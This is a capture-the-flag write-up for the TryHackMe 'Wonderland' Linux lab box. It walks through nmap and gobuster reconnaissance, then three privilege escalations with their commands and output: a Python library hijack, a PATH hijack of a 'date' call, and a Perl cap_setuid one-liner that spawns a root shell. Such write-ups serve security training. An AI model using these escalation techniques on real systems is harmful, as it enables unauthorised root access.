👀
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Nmap
  • Enumeration
  • Gobuster
  • Initial Access
  • Privilege Escalation
  • Horizontal Escalation to Rabbit
  • Horizontal Escalation to Hatter
  • Vertical Escalate to Root
  1. Try Hack Me - THM
  2. Linux Boxes

Wonderland

Fall down the rabbit hole and enter wonderland.

Scanning

Nmap

$ nmap -sV -sC 10.10.59.87       

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST
Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:F4:A0:15:1D:53 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Enumeration

Gobuster

$ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.59.87
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/02 00:03:13 Starting gobuster
===============================================================
/img (Status: 301)
/poem (Status: 301)
/r (Status: 301)
===============================================================
2021/10/02 00:03:14 Finished
===============================================================

/img & /poem nothing interesting no binaries ...

check /r

we will use same command of gobuster and add new directory to the url

in this case we will use alphabet wordlist

$ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt
/a
$ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt
/i
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt
/t
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt
​

the end ... no where to go

openhttp://10.10.59.87/r/a/b/b/i/t on in browser

view source

Initial Access

ssh target using these credentials

Privilege Escalation

Horizontal Escalation to Rabbit

check if alice have any sudo privilege

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice can run this script walrus_and_the_carpenter.py with rabbit privilege

check walrus_and_the_carpenter this code use python library called random

so lets hijack this library

know more about python library hijack article

create fake library with same name 

alice@wonderland:~$ echo "import os
os.system('/bin/bash')" > random.py

run walrus_and_the_carpenter with rabbit privilege

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$

Horizontal Escalation to Hatter

check home directory teaparty here

run it

it seems to trigger $ date command

  • write a command you wanna to execute in file with same name

  • export the path to path_variable

  • run script

rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date 
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ pwd
/home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter

in this directory you can find password.txt

login using ssh as hatter

Vertical Escalate to Root

check capabilities

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

we can cap_setuid+ep Perl

check GTFOBins 

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
PreviousAnonymousNextBlog

Last updated 3 years ago